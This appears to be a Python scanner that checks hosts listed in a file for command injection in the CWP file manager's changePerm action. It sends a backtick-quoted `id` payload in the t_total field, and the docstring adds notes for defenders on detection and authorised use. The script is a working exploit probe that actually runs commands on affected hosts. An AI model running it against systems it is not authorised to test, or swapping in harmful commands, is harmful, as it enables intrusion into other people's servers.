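"""Active check for command injection in the CWP file manager ``changePerm`` action.

For every host in a target list, POST a ``t_total`` value holding a
backtick-quoted ``id`` command and report whether ``id``-style output comes
back in the response body.

Notes for operators and defenders:

* The check is active, not passive: on an affected host the ``id`` command
  is actually executed, so run it only against systems you are responsible
  for and expect it to show up in their logs.
* Each probe is a POST to ``index.php?module=filemanager&acc=changePerm``
  whose ``t_total`` field contains backticks. Requests of that shape in web
  server or WAF logs are a useful detection signal.
* TLS verification is switched off, so the identity of the answering server
  is not authenticated and a result may come from an intercepting device.
"""

import re

import requests
import urllib3

# Disable SSL cert warnings: every request below uses verify=False, which
# would otherwise emit one InsecureRequestWarning per target.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Shape of real `id` output, e.g. "uid=1000(name) gid=1000(name)".  The
# "(name)" part is optional because `id` omits it for ids without a name.
# Matching this instead of the bare substring "uid=" avoids flagging pages
# that merely contain "uid=" in a link, form field or script.
_ID_OUTPUT = re.compile(r"uid=\d+(?:\([^)]*\))?\s+gid=\d+")


def test_target(target_ip, port, username):
    """Probe one host and print whether the injected ``id`` output is reflected.

    Args:
        target_ip: IP address or hostname of the panel.
        port: TCP port of the panel, as used in the URL.
        username: Known valid panel user, sent as the ``user`` form field.

    Prints one status line; returns nothing.  Request failures (timeout,
    connection refused, TLS errors) are reported, not raised.
    """
    url = f"https://{target_ip}:{port}/admin/index.php?module=filemanager&acc=changePerm"
    data = {
        'user': username,
        't_total': '`id`'
    }

    try:
        # verify=False: the certificate is not checked (presumably because
        # panels commonly run self-signed certificates -- confirm).
        response = requests.post(url, data=data, verify=False, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[!] Error with {target_ip}:{port} — {e}")
        return

    if _ID_OUTPUT.search(response.text):
        print(f"[!] VULNERABLE: {target_ip}:{port} — Command executed")
    else:
        # NOTE(review): a negative only means no id-style output appeared in
        # the body; it is not proof that the host is patched (the request may
        # have been rejected, redirected, or the output not reflected).
        print(f"[-] Not Vulnerable or Patched: {target_ip}:{port}")


def scan_targets(file_path, port, username):
    """Run ``test_target`` against every non-blank line of ``file_path``.

    Args:
        file_path: Text file with one IP address or hostname per line.
        port: Panel port passed through to ``test_target``.
        username: Panel user passed through to ``test_target``.

    A missing or unreadable file is reported and the scan is skipped.
    """
    try:
        with open(file_path, "r", encoding="utf-8") as f:
            targets = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"[X] File not found: {file_path}")
        return
    except OSError as e:
        # Permission denied, path is a directory, etc. -- previously these
        # escaped as an unhandled traceback.
        print(f"[X] Cannot read {file_path}: {e}")
        return

    for target in targets:
        test_target(target, port, username)


if __name__ == "__main__":
    # === CONFIGURATION ===
    target_file = "targets.txt"     # File containing IPs or hostnames
    cwp_port = "2083"               # Change to 2087 for admin panel
    known_user = "testuser"         # Known valid CWP user (not root)

    print(f"[*] Scanning targets in {target_file}...\n")
    scan_targets(target_file, cwp_port, known_user)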